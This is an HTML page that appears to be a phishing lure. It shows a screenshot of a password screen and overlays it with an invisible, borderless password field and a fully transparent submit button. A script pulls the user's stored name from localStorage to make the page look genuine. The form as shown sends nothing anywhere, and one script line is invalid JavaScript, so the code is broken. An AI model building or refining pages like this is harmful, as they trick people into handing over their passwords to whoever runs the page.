<!DOCTYPE html>
<html>
  <head>
    <style>
      #myImage {
        width: 1000px;
        height: 550px;
        object-fit: contain;
        position: absolute;
        top: 0px;
        left: 150px;
      }
        
       input[type=text] {
  background-color: #FFFFFF;
  color: #000000;
  border: none;
  outline: none;
  position: absolute;
  top: 260px;
  left: 490px;
}
      input[type=submit] {
  background-color: #FFFFFF;
  color: #000000;
  border: none;
  outline: none;
  position: absolute;
  top: 385px;
  left: 770px; 
  opacity: 0.0;
}
    </style>
  </head>
  <body>
      <img id="myImage" src="password_page.png" /> 
    <span id = "email"></span>
    <form action>
      <input type="text" id="password" name="password" placeholder = "Enter your Password" maxlength = "30" size = "30">
      <input type="submit" value="Submit">
    </form>
    <script>
      const username = localStorage.getItem("user-name");
      document.getElementById("email") = username;
    </script>
  </body>
</html>
